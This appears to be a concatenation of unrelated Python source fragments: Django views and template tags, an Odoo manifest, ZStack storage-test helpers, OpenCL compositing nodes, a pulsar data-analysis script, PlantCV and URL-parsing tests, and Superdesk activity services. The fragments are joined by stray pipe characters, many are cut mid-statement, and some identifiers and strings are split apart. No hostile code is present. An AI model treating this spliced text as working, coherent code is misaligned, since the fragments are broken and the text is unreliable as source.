self.tag_tag = Variable(tag)
def render(self,context):
try:
_tag = self.tag_tag.resolve(context)
_font_size = _tag.font_size + 10
_font_weight = min(900,(300 + (_tag.font_size*100)))
_url = reverse(job_list_by_tag, kwargs = {'tag_name' : _tag.name } )
return "<span style='font-size:%spx;font-weight:%s'><a href='%s'>%s</a></span>" % (_font_size,_font_weight,_url,_tag.name)
except VariableDoesNotExist:
return ''
register.tag('populate_tag', do_populate_tags) |
# -*- coding: utf-8 -*-
# Copyright 2016 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
'name': 'L10n Br Resource',
'summary': """
This module extend core resource to create important brazilian
informations. Define a Brazilian calendar and some tools to compute
dates used in financial and payroll modules""",
'version | ': '8.0.1.0.0',
'license': 'AGPL-3',
'author': 'KMEE,Odoo Community Association (OCA)',
'website': 'www.odoobrasil.org.br',
'depends': [
'l10n_br_base',
'resource',
],
'external_dependencies': {
'python': ['pybrasil'],
},
'data': [
'views/resource_calendar.xml',
'views/resource_calendar_leaves. | xml',
'views/menu_resource_calendar.xml',
'wizard/workalendar_holiday_import.xml',
],
}
|
nv, bandwidth, path = '/tmp', raise_exception=True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 360
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
if '/dev/' in path:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=100M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=900M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
else:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=100M -filename=%s/test1.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=900M -filename=%s/test2.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
test_util.test_logger('test_fio_bandwidth: %s' % line)
results = line.split()
for result in results:
if 'bw=' in result:
if 'MB' in result:
bw = int(float(result[3:].split('MB')[0])) * 1024
else:
bw = int(float(result[3:].split('KB')[0]))
#cleanup_log()
if bw == 0:
if not raise_exception:
test_util.test_logger('Did not get bandwidth for fio test')
return False
test_util.test_fail('Did not get bandwidth for fio test')
threshold = bandwidth/1024/2
bw_up_limit = bandwidth/1024 + threshold
bw_down_limit = bandwidth/1024 - threshold
if bw > bw_down_limit and bw < bw_up_limit:
test_util.test_logger('disk bandwidth:%s is between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
return True
else:
test_util.test_logger('disk bandwidth:%s is not between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
if raise_exception:
test_util.test_fail('fio bandwidth test fails')
return False
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering_uuid = res_ops.query_resource(res_ops.DISK_OFFERING)[0].uuid
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering_uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def migrate_vm_to_random_host(vm, timeout = None):
test_util.test_dsc("migrate vm to random host")
target_host = test_lib.lib_find_random_host(vm.vm)
current_host = test_lib.lib_find_host_by_vm(vm.vm)
vm.migrate(target_host.uuid, timeout)
new_host = test_lib.lib_get_vm_host(vm.vm)
if not new_host:
test_util.test_fail('Not find available Hosts to do migration')
if new_host.uuid != target_host.uuid:
test_util.test_fail('[vm:] did not migrate from [host:] %s to target [host:] %s, but to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid, new_host.uuid))
else:
test_util.test_logger('[vm:] %s has been migrated from [host:] %s to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid))
def create_eip(eip_name=None, vip_uuid=None, vnic_uuid=None, vm_obj=None, \
session_uuid = None):
if not vip_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_uuid = net_ops.acquire_vip(l3_uuid).uuid
eip_option = test_util.EipOption()
eip_option.set_name(eip_name)
eip_option.set_vip_uuid(vip_uuid)
eip_option.set_vm_nic_uuid(vnic_uuid)
eip_option.set_session_uuid(session_uuid)
eip = zstack_eip_header.ZstackTestEip()
eip.set_creation_option(eip_option)
if vnic_uuid and not vm_obj:
test_util.test_fail('vm_obj can not be None in create_eip() API, when setting vm_nic_uuid.')
eip.create(vm_obj)
return | eip
def create_vip(vip_name=None, l3_uuid=None, session_uuid = None, required_ip=None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_c | reation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_session_uuid(session_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def create_vip_with_ip(vip_name=None, l3_uuid=None, required_ip=None, session_uuid = None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_creation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip_creation_option.set_session_uuid(session_uuid)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def attach_mount_volume(volume, vm, mount_point):
volume.attach(vm)
import tempfile
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | grep disk | awk '{print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
''' % (mount_point, mount_point))
script_file.close()
vm_inv = vm.get_vm()
if not test_lib.lib_execute_shell_script_in_vm(vm_inv, script_file.name):
test_util.test_fail("mount operation failed in [volume:] %s in [vm:] %s" % (volume.get_volume().uuid, vm_inv.uuid))
os.unlink(script_file.name)
def time_convert(log_str):
time_str = log_str.split()[0]+' '+log_str.split()[1]
time_microscond = time_str.split(',')[1]
time_str = time_str.split(',')[0]
time_tuple = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
return int(time.mktime(time_tuple)*1000+int(time_microscond))
def get_stage_time(vm_name, begin_time):
mn_server_log = "/usr/local/zstacktest/apache-tomcat/logs/management-server.log"
file_obj = open(mn_server_log)
for line in file_obj.readlines():
if line.find('APICreateVmInstanceMsg') != -1 and line.find(vm_name) != -1:
time_stamp = time_convert(line)
if int(time_stamp) >= begin_time:
api_id = line.split('{"', 1)[1].split(',')[-3].sp |
"""
Copyright (c) 2012-2020 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without | even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from smart_manager.models import CPUMetric
from smart_manager.serializers import CPUMetricSerializer
from generic_sprobe impor | t GenericSProbeView
class CPUMetricView(GenericSProbeView):
serializer_class = CPUMetricSerializer
model_obj = CPUMetric
|
from django.template import Context | , loader
from pokemon.models import Pokemon
from django.http import HttpResponse
from django.http import Http404
def index(request):
Pokemons = Pokemon.objects.all().order_by('id_pokemon')
t = loader.get_template('pokemon/index.html')
c = Context({
'Pokemons': Pokemons,
})
return Ht | tpResponse(t.render(c))
def pokemon(request, id):
try:
Pkmn = Pokemon.objects.get(id_pokemon=id)
except Pokemon.DoesNotExist:
raise Http404
return HttpResponse(loader.get_template('pokemon/pokemon.html').render(Context({'Pokemon': Pkmn,}))) |
#
# Copyright (c) 2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU Lesser General Public
# License as published by the Free Software Fou | ndation; either version
# 2 of the License (LGPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You s | hould
# have received a copy of LGPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt.
#
# Jeff Ortel <jortel@redhat.com>
#
"""
The I{metrics} module defines classes and other resources
designed for collecting and reporting performance metrics.
"""
import time
from math import modf
class Timer:
def __init__(self, started=0, stopped=0):
self.started = started
self.stopped = stopped
def start(self):
self.started = time.time()
self.stopped = 0
return self
def stop(self):
if self.started > 0:
self.stopped = time.time()
return self
def duration(self):
return ( self.stopped - self.started )
def __str__(self):
if self.started == 0:
return 'not-running'
if self.started > 0 and self.stopped == 0:
return 'started: %d (running)' % self.started
duration = self.duration()
jmod = ( lambda m : (m[1], m[0]*1000) )
if duration < 1:
ms = (duration*1000)
return '%d (ms)' % ms
if duration < 60:
m = modf(duration)
return '%d.%.3d (seconds)' % jmod(m)
m = modf(duration/60)
return '%d.%.3d (minutes)' % jmod(m)
|
__vers | ion_info__ = ('1', '0', '0')
__version__ = '.'.joi | n(__version_info__)
|
from copper.cop.cop_node import CopNode
import pyopencl as cl
import numpy
from PIL import Image
class COP2_Comp_Add(CopNode):
'''
This filter adds foreground over background using OpenCL
'''
type_name = "add"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Add, self).__init__(engine, parent)
self.program = engine.load_program("comp_add.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler( | self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_add(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(), |
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
)
exec_evt.wait()
class COP2_Comp_Blend(CopNode):
'''
This filter blends foreground over background using OpenCL
'''
type_name = "blend"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Blend, self).__init__(engine, parent)
self.program = engine.load_program("comp_blend.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
self.addParameter("factor", float, 0.5)
def bypass_node(self):
factor = self.parm("factor").evalAsFloat()
if factor <= 0.0:
self.log("Bypassing with node %s at input 0" % (self.input(0).path()))
return self.input(0)
if factor >= 1.0:
self.log("Bypassing with node %s at input 1" % (self.input(1).path()))
return self.input(1)
return None
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_blend(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
numpy.float32(self.parm("factor").evalAsFloat())
)
exec_evt.wait()
|
"""Scikit Flow Estimators."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "L | icense");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# li | mitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.learn.python.learn.estimators.base import TensorFlowEstimator, TensorFlowBaseTransformer
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearRegressor
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowRegressor
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.autoencoder import TensorFlowDNNAutoencoder
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
|
from django import for | ms
from models | import edi_address
class DocumentForm(forms.ModelForm):
docfile = forms.FileField()
class Meta:
model = edi_address
fields = ["docfile",]
|
}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#r | adioIndexBinsFine = np.arange(1369 | ,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over 5 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import m | odels, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main', '0019_auto_20170521_1332'),
]
operations = [
migrations.CreateModel(
name='RecentActivity',
| fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField()),
('type', models.CharField(max_length=255, choices=[(b'follow', b'Followers/Subscribers'), (b'support', b'Recurring Support')])),
('data', models.TextField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
|
import | pytest
import cv2
from plantcv.plantcv.visualize import auto_threshold_methods
def test_auto_threshold_methods_bad_input(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_rgb_img)
with pyt | est.raises(RuntimeError):
_ = auto_threshold_methods(gray_img=img)
def test_auto_threshold_methods(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_gray_img, -1)
labeled_imgs = auto_threshold_methods(gray_img=img)
assert len(labeled_imgs) == 5
|
# Copyright (c) 2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from unittest import TestCase
from gofer.messaging.adapter.url import URL
from gofer.messaging.adapter.url import PORT, Scheme
class Test(object):
def __init__(self,
url,
adapter=None,
scheme=None,
host=None,
port=None,
userid=None,
password=None,
path=None):
self.url = url
self.adapter = adapter
self.scheme = scheme
self.host = host
self.port = port
self.userid = userid
self.password = password
self.path = path
def __call__(self, test):
url = URL(self.url)
test.assertEqual(url.adapter, self.adapter)
test.assertEqual(url.scheme, self.scheme)
test.assertEqual(url.host, self.host)
test.assertEqual(url.port, self.port)
test.assertEqual(url.userid, self.userid)
test.assertEqual(url.password, self.password)
test.assertEqual(url.path, self.path)
TESTS = [
Test('qpid+amqp://elmer:fudd@blue:5000/all',
adapter='qpid',
scheme='amqp',
host='blue',
port=5000,
userid='elmer',
password='fudd',
path='all'),
Test('amqp://elmer:fudd@yellow:1234//',
scheme='amqp',
host='yellow',
port=1234,
userid='elmer',
password='fudd',
path='/'),
Test('amqp://green:5678/all/good',
scheme='amqp',
host='green',
port=5678,
path='all/good'),
Test('amqp://red:2323',
scheme='amqp',
host='red',
port=2323),
Test('amqp://black',
scheme='amqp',
host='black',
port=5672),
Test('amqps://purple',
scheme='amqps',
host='purple',
port=5671),
Test('orange:6545',
scheme='amqp',
host='orange',
port=6545),
Test('localhost',
scheme='amqp',
host='localhost',
port=5672),
Test('',
scheme='amqp',
port=5672),
]
class TestURL(TestCase):
def test_parsing(self):
for test in TESTS:
test(self)
def test_canonical(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000'
]
for _url in urls:
url = URL(_url)
self.assertEqual(url.canonical, _url.split('+')[-1].rsplit('/all')[0])
def test_is_ssl(self):
# false
url = URL('amqp://localhost')
self.assertFalse(url.is_ssl())
# true
url = URL('amqps://localhost')
self.assertTrue(url.is_ssl())
def test_hash(self):
url = URL('test')
self.assertEqual(hash(url), hash(url.canonical))
def test_str(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-hos | t:5000',
'amqp://test-host',
]
for _url in urls:
url = URL(_url)
self.assertEqual(str(url), url.canonical)
class TestScheme(TestCase):
def test_validated(self):
for n in PORT:
self.assertEqual(Scheme.validated(n), n.lower())
self.assertRaises(ValueError, Sche | me.validated, 'unsupported')
|
lf, resource, docs):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
if not len(docs):
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'created',
'extra': docs[0]
}
self.post([audit])
def on_generic_updated(self, resource, doc, original):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'updated',
'extra': doc
}
self.post([audit])
def on_generic_deleted(self, resource, doc):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'deleted',
'extra': doc
}
self.post([audit])
class ActivityResource(Resource):
endpoint_name = 'activity'
resource_methods = ['GET']
item_methods = ['GET', 'PATCH']
schema = {
'name': {'type': 'string'},
'message': {'type': 'string'},
'data': {'type': 'dict'},
'recipients': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'user_id': Resource.rel('users'),
'read': {'type': 'boolean', 'default': False},
'desk_id': Resource.rel('desks')
}
}
},
'item': Resource.rel('archive', type='string'),
'user': Resource.rel('users'),
'desk': Resource.rel('desks'),
'resource': {'type': 'string'}
}
exclude = {endpoint_name, 'notification'}
datasource = {
'default_sort': [('_created', -1)],
'filter': {'_created': {'$gte': utcnow() - datetime.timedelta(days=1)}}
}
superdesk.register_default_user_preference('email:notification', {
'type': 'bool',
'enabled': True,
'default': True,
'label': 'Send notifications via email',
'category': 'notifications',
})
class ActivityService(BaseService):
def on_update(self, updates, original):
""" Called on the patch request to mark a activity/notification/comment as having been read and
nothing else
:param updates:
:param original:
:return:
"""
user = getattr(g, 'user', None)
if not user:
raise SuperdeskApiError.notFoundError('Can not determine user')
user_id = user.get('_id')
# make sure that the user making the read notification is in the notification list
if not self.is_recipient(updates, user_id):
raise SuperdeskApiError.forbiddenError('User is not in the notification list')
# make sure the transition is from not read to read
if not self.is_read(updates, user_id) and self.is_read(original, user_id):
raise SuperdeskApiError.forbiddenError('Can not set notification as read')
# make sure that no other users are being marked as read
for recipient in updates.get('recipients', []):
if recipient['user_id'] != user_id:
if self.is_read(updates, recipient['user_id']) != self.is_read(original, recipient['user_id']):
raise SuperdeskApiError.forbiddenError('Can not set other users notification as read')
# make sure that no other fields are being up dated just read and _updated
if len(updates) != 2:
raise SuperdeskApiError.forbiddenError('Can not update')
def is_recipient(self, activity, user_id):
"""
Checks if the given user is in the list of recipients
"""
return any(r for r in activity.get('recipients', []) if r['user_id'] == user_id)
def is_read(self, activity, user_id):
"""
Returns the read value for the given user
"""
return next((r['read'] for r in activity.get('recipients', []) if r['user_id'] == user_id), False)
ACTIVITY_CREATE = 'create'
ACTIVITY_UPDATE = 'update'
ACTIVITY_DELETE = 'delete'
